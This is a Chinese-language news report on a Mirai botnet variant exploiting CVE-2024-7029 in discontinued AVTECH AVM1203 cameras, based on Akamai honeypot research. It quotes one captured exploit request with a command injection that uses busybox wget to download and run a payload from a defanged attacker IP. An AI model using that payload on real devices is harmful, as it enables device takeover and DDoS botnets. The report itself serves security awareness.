恶意黑客正在利用一个广泛使用的安全摄像头中的关键漏洞来传播Mirai,这是一种将受感染的物联网设备组成大型网络的恶意软件家族,用于发动攻击,导致网站和其他联网设备瘫痪。
据网络安全提供商Akamai周三表示,这些攻击的目标是来自台湾制造商AVTECH的监控设备AVM1203
。自3月以来,不明攻击者一直在利用这一存在5年的漏洞。这一零日漏洞被追踪为CVE-2024-7029,易于利用,允许攻击者执行恶意代码。AVM1203已经不再销售或提供支持,因此没有可用的更新来修复这一关键零日漏洞。
一次杂牌军队震撼互联网的时刻
Akamai表示,攻击者正在利用这一漏洞安装一种Mirai变种,Mirai于2016年9月首次出现,当时一个受感染设备的僵尸网络攻击了网络安全新闻网站Krebs on Security。Mirai具有功能,可以让一支杂牌军队由被攻陷的网络摄像头、路由器和其他类型的物联网设备组成,发动分布式拒绝服务(DDoS)攻击,达到创纪录的规模。
接下来的几周里,Mirai僵尸网络对互联网服务提供商和其他目标发起了类似的攻击。其中一次针对动态域名提供商Dyn的攻击瘫痪了互联网的大片区域。由于Mirai的创建者将恶意软件公开发布,几乎任何人都可以创建自己的僵尸网络,发动曾经难以想象的规模的DDoS攻击,这使得遏制Mirai的尝试变得更加复杂。
Akamai的安全情报与响应团队的安全研究员Kyle Lefton在一封电子邮件中表示,他们观察到攻击背后的威胁行为者对“各种组织”执行了DDoS攻击,但他没有进一步命名或描述这些组织。
目前,该团队尚未看到威胁行为者监控视频源或将受感染的摄像头用于其他目的的迹象。Akamai使用一种“蜜罐”技术检测到了这些活动,该技术在开放的互联网上模拟这些摄像头,以观察针对它们的攻击。这种技术并不允许研究人员测量僵尸网络的规模。美国网络安全和基础设施安全局(CISA)在本月早些时候警告了这一漏洞。然而,这种技术允许Akamai捕获用于攻陷设备的代码。
该漏洞自2019年以来就已为人所知,当时利用代码公开。零日漏洞存在于“action=”参数的“亮度参数”中,允许进行命令注入,研究人员写道。该零日漏洞由Akamai研究员Aline Eliovich发现,直到本月发布CVE-2024-7029时才正式承认。
周三的帖子继续说明:
它如何工作?
最初是在检查我们的蜜罐日志时发现了这个漏洞。
在我们观察到的利用示例中,基本上发生的是:利用这一漏洞可以让攻击者在目标系统上执行远程代码。图3显示了威胁行为者利用这个漏洞下载并运行一个JavaScript文件以获取并加载他们的主要恶意软件有效载荷的一个例子。
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"$(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 * /tmp/mips; /tmp/mips huawei.rep)$(echo HUAWEIUPNP)
该僵尸网络还利用了其他几个漏洞,包括Hadoop YARN RCE、CVE-2014-8361和CVE-2017-17215。
我们多次观察到这些漏洞被实际利用,并且它们仍然成功。由于该摄像头型号不再受支持,任何使用该设备的人最好的做法是更换它。
与所有联网设备一样,物联网设备绝不应使用出厂时附带的默认凭据进行访问。
